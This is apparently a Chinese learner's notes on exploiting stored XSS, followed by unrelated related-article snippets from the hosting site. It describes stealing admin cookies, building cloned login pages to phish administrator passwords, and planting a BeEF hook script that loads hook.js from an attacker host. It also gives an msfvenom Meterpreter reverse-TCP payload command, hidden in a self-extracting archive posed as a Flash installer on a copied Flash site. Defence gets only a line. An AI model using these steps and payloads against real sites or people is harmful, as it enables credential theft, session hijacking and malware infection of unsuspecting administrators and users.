DAY22xss2

远程调用xss平台网站需要在意是http还是https协议 cookie的利用 

1.抓包利用

2.特定浏览器活软件

这个浏览器的使用教程

点进去之后再点击这个

然后我们开始 利用cookie

cookie有几个值我们就添加几个

3.浏览器插件

遇到的突发情况 例如空白 404 

这个时候我们要有种思维

变换页面 可能是我们的管理界面被换了 只删了留言我们可以改id 或者把参数改了

如果页面也没了 我们尝试访问admin等其他目录、

当然这些都以cookie有效为前提

总的来说就是扫二级目录

遇到safedog 的登录2级验证

也是尝试二级目录更换页面

3  什么情况使用马哥欺骗工具 但是不管什么站都能使用bp

https-only开启时我们进行的攻击

利用htto-only 获取cookie有一定限制 例如下面这个

怎么确定打开http-only 使用awvs

原理 我们利用xss 让管理员进入他的登录界面后会重新进入我们制造好的钓鱼页面 

进入后输入密码 我们 在返回给他正常的登录界面   在我们的vps上就有他的账号和密码了

伪造页面步骤:1.准备好http-only利用代码

源码展示 后台代码

跳转到真正的登录界面

在使用前需要先创建一个数据库

把之前已经伪造过的页面删除 我们需要创建新的伪造页面

步骤如下 正常的下载这个网页不过需要将后缀改为htm

但是这样的下载会因为编码问题出现很多问题所以我建议还是使用kali当中的下图软件进行下载

下载好后不要用外面这个

这个才是真的

下载好后查看源码 发现后台的代码还需要我们做出修改

把action修改如下

然后检查表单 用户 和 密码  修改一下name

然后就好了

接下来就是将钓鱼链接利用存储型 xss 放在留言板 进行攻击

但是管理员进入后有bug 会立刻发现自己被钓鱼了

将这一串代码放在xss代码网站

把这个代码替换了   但是下面标蓝的代码我们需要放到平台里面

把这个放进去

然后我们获取到密码后删除这个项目就行了

xss登录利用案例

这个cms会记录用户名和密码登录情况 这样就会有xss

用户名 有长度限制 然后我们 用极限代码 当然能不用 最好不要用 应为会导致界面显示不完整

beef-xss利用

kali自带 beef -xxs启动 密码也是beef 密码我们可以设置为admin溜进去的是这个代码

让我们访问一下看看源码

使用的话就是在有存储型xss代码下 加上这句话

<script src"https://192. 168. 10. 101:3000/hook.js"></script>

比较脆弱 管理员关了浏览器界面就失效了

然后当管理员进入留言板界面 不需要点击我们留言板内容不需要吸引 反正视频演示时他没有点进去 让我们的beef-xss界面就能看见我们黑进去的网站了  如下

绿色代表命令可以用 灰色 未知   橙色 容易被管理员察觉 红色不能用 可以尝试  点点或许又行

选中 然后双击下图 就能执行命令

这些命令作用 看英文就知道了 功能很强大 比简单的xss平台好用很多

创建框架 上图标蓝的地方是一种权限维持方案 使用后创建百分百隐藏框架 只要管理员在页面当中会一直停在一个页面 怎么举例呢 就是现在b站吧点进一个视频会跳出一个新网站 而不是把b站首页覆盖了 会一直维持 也就是会跳转新窗口

联合kali的MSF进行钓鱼 目前看来似乎就是往压缩包里面下毒

在kali当中输入这个命令

msfvenon -p windows/meterpreter/reverse_tcp lhost=192.168.80.103 lport=1122 -f exe > 1.exe

第一步 创建 压缩文件 勾选创建自解压格式压缩文件

第二步高级 自解压选项

选路径 不要直接c:   选择一些我们一般有权限的 怎么看呢:

选c盘随便一个文件夹 看需要管理员权限否

这种就行

第3 步 设置解压后运行下图有些错误 我们要把flash也能 解压

第4步设置 模式 有隐藏

第5步更新 覆盖所有文件

然后直接创建出来

下载flsh官网然后 改名

为了更像 去官网 在body这块彻底cv一下

然后再源码这修改下载地址 把我们的包放进去也就是我们网站根目录

第6步开监听

第7步 别人点了安装包就 监听成功

XSS平台搭建

不好用 不如自己买vps

在我们虚拟机写好代码

创建在phpstudy  然后想办法通过隧道连接外网

然后我们用的是 内网连内网 是不用隧道

主要是加载我们的phpstud网站中的 x.txt的代码

然后就打印过来了

为了防止被发现    可以改一下名字

然后是iis xss平台搭建 我没有源码没法自己搭建 需要的可以去视频1.25看

github上有

通过POST  修改为 get  然后通过管理员 去点击链接  然后显示了一个界面实际上已经创建成功我们想要的结果

防御 输入验证码 

审查陌生链接源码

通过来源判断

可以用来水报告 这个漏洞   看起危险 实际上鸡肋

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/646314.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SpringBoot,TDengine时序数据库,实现物联网,车联网大批量数据更新最佳实践。

简介 TDengine 是一款专为物联网、工业互联网等场景设计并优化的大数据平台&#xff0c;它能安全高效地将大量设备、数据采集器每天产生的高达 TB 甚至 PB 级的数据进行汇聚、存储、分析和分发&#xff0c;对业务运行状态进行实时监测、预警&#xff0c;提供实时的商业洞察。其…

tp5中使用ueditor编辑器保存文本到数据库后编辑时数据回显显示html标签问题解决办法

数据表中保存的数据为带html标签的源码&#xff0c;如图&#xff1a; 编辑器页面需要的内容&#xff1a; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head><…

网络通信课程总结(小飞有点东西)

27集 局域网通信&#xff1a;用MAC地址 跨局域网通信&#xff1a;用IP地址&#xff08;MAC地址的作用只是让我们找到网关&#xff09; 又因为arp技术&#xff0c;可以通过MAC地址找到IP地址&#xff0c;所以我们可以通过IP地址定位到全世界任意一台计算机。 28集 在数据链路…

255:vue+openlayers 加载tomtom地图(多种形式)

第255个 点击查看专栏目录 本示例的目的是介绍演示如何在vue+openlayers中添加tomtom地图,这里包含了多种形式,诸如中文标记、英文标记、白天地图、晚上地图、卫星影像图,高山海拔地形图等。 直接复制下面的 vue+openlayers源代码,操作2分钟即可运行实现效果 文章目录 示…

爬虫是什么 怎么预防

爬虫是一种自动化程序&#xff0c;用于从网页或网站中提取数据。它们通过模拟人类用户的行为&#xff0c;发送HTTP请求并解析响应&#xff0c;以获取所需的信息。 爬虫可以用于各种合法用途&#xff0c;如搜索引擎索引、数据采集和监测等。然而&#xff0c;有些爬虫可能是恶意的…

2. figure 常见属性

2. figure 常见属性 一 figsize二 dpi三 facecolor四 edgecolor五 frameon 数据可视化是数据分析中不可或缺的一环&#xff0c;而Matplotlib作为Python中最流行的绘图库之一&#xff0c;扮演着重要的角色。在Matplotlib中&#xff0c;matplotlib.figure.Figure对象是构建图形的…

3d模型素材下载选择哪个网站比较好?

3d模型素材下载选择哪个网站比较好?需要在选择3D模型素材下载网站时&#xff0c;考虑以下几个方面&#xff1a; 1、网站的专业性和知名度&#xff1a;选择知名的、专业的网站可以提高获取到优质模型素材的概率&#xff0c;并且能够保证模型的品质和准确性。 2、模型的种类和质…

unity学习笔记----游戏练习06

一、豌豆射手的子弹控制 创建脚本单独控制子弹的运动 用transform来控制移动 void Update() { transform.Translate(Vector3.right * speed * Time.deltaTime); } 创建一个控制子弹速度的方法&#xff0c;方便速度的控制 private void SetSpeed(float spee…

Qt顶部圆角窗体

Qt&#xff1a;实现顶层窗体圆角_qt 圆角窗口弹窗-CSDN博客 setWindowFlags(Qt::FramelessWindowHint);QBitmap bmp(this->size());bmp.fill();QPainter p(&bmp);p.setPen(Qt::NoPen);p.setBrush(Qt::black);p.setRenderHint(QPainter::Antialiasing);p.drawRoundedRec…

如何设计性能测试用例!一文1000字详解(建议收藏)

性能测试是确保软件应用在各种负载和条件下都能保持良好性能的关键活动&#xff0c;涉及到系统的响应时间&#xff0c;还包括吞吐量、资源利用率、可靠性和系统的可伸缩性。 性能测试用例设计需要对业务需求和系统行为有深刻理解&#xff0c;设计过程涉及确定测试目标、选择相…

Docker应用-自定义网络连接

Docker网络 文章目录 Docker网络网络的基础配置自定义网络网络连通 网络的基础配置 大量的互联网应用服务包括多个服务组件&#xff0c;这往往需要多个容器之间通过网络通信进行互相配合。 目前Docker提供了映射容器端口到宿主机主机和容器互联机制来为容器提供网络服务&…

软件功能测试如何确定测试需求?CMA、CNAS软件测试报告获取

软件功能测试是为了验证软件的功能是否按照设计要求正常工作的过程&#xff0c;可以确保软件的质量&#xff0c;提高用户体验&#xff0c;也是保证软件安全和可靠性的重要一环。我们需要从多个角度对软件的各个功能模块进行测试&#xff0c;确保每个功能都能正常运行&#xff0…

抖捧AI实景自动直播怎么玩

​在如今的全民直播时代&#xff0c;直播已经成为了众多实体店、品牌方所刚需的技能&#xff0c;但是大多数都不具备太多的直播能力 &#xff0c;这个时候实景自动直播就应运而生&#xff0c;但是很多人都没有想清楚&#xff0c;AI实景自动直播&#xff0c;到底适不适合自己用呢…

蓝桥杯(Python)每日练Day5

题目 OJ1229 题目分析 题目完全符合栈的特征&#xff0c;后进先出。如果能够熟练使用列表的9种方法那么这道题很容易解出。 题解 a[]#存衣服 nint(input()) for i in range(n):llist(input().split())#判断每一步的操作if len(l[0])2:a.append(l[1])else:while a.pop()!l…

本地部署Tomcat开源服务器并结合内网穿透远程访问

文章目录 前言1.本地Tomcat网页搭建1.1 Tomcat安装1.2 配置环境变量1.3 环境配置1.4 Tomcat运行测试1.5 Cpolar安装和注册 2.本地网页发布2.1.Cpolar云端设置2.2 Cpolar本地设置 3.公网访问测试4.结语 前言 Tomcat作为一个轻量级的服务器&#xff0c;不仅名字很有趣&#xff0…

Obsidian笔记软件结合cpolar实现安卓移动端远程本地群晖WebDAV数据同步

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…

【Kubernetes】深入了解Kubernetes(K8s):现代容器编排的引领者

欢迎来到英杰社区&#xff1a; https://bbs.csdn.net/topics/617804998 欢迎来到阿Q社区&#xff1a; https://bbs.csdn.net/topics/617897397 作者简介&#xff1a; 辭七七&#xff0c;目前大二&#xff0c;正在学习C/C&#xff0c;Java&#xff0c;Python等 作者主页&#xf…

JavaEE之多线程编程:4. 线程安全(重点!!!)

文章目录 一、观察线程不安全二、线程安全的概念三、线程不安全的原因1. 关于线程不安全的解释1. 抢占式执行2. 修改共享数据3. 原子性4. 可见性5. 指令重排序问题 四、解决之前的线程不安全的问题五、synchronized 关键字&#xff08;两个线程同时修改一个变量&#xff09;1. …

python基础教程:属性查询顺序,数据描述符

嗨喽&#xff0c;大家好呀~这里是爱看美女的茜茜呐 数据描述符&#xff0c;属性查找优先级 如果在一个类中定义了 __get__() , __set__(), __delete__() 这三种方法之一&#xff0c;那么这个类是一个描述符。 描述符分成两种&#xff1a; 如果这种类只定义了 __get__ 方法&…

核桃的数量---蓝桥杯

思路&#xff1a; 题目所代表的意思就是a,b,c这三个必须是核桃数量的因子&#xff0c;即a,b,c三个的最小公倍数 #include <iostream> #include <algorithm> using namespace std; // int main() { int a,b,c;cin>>a>>b>>c;int da*b/__gcd(a,b…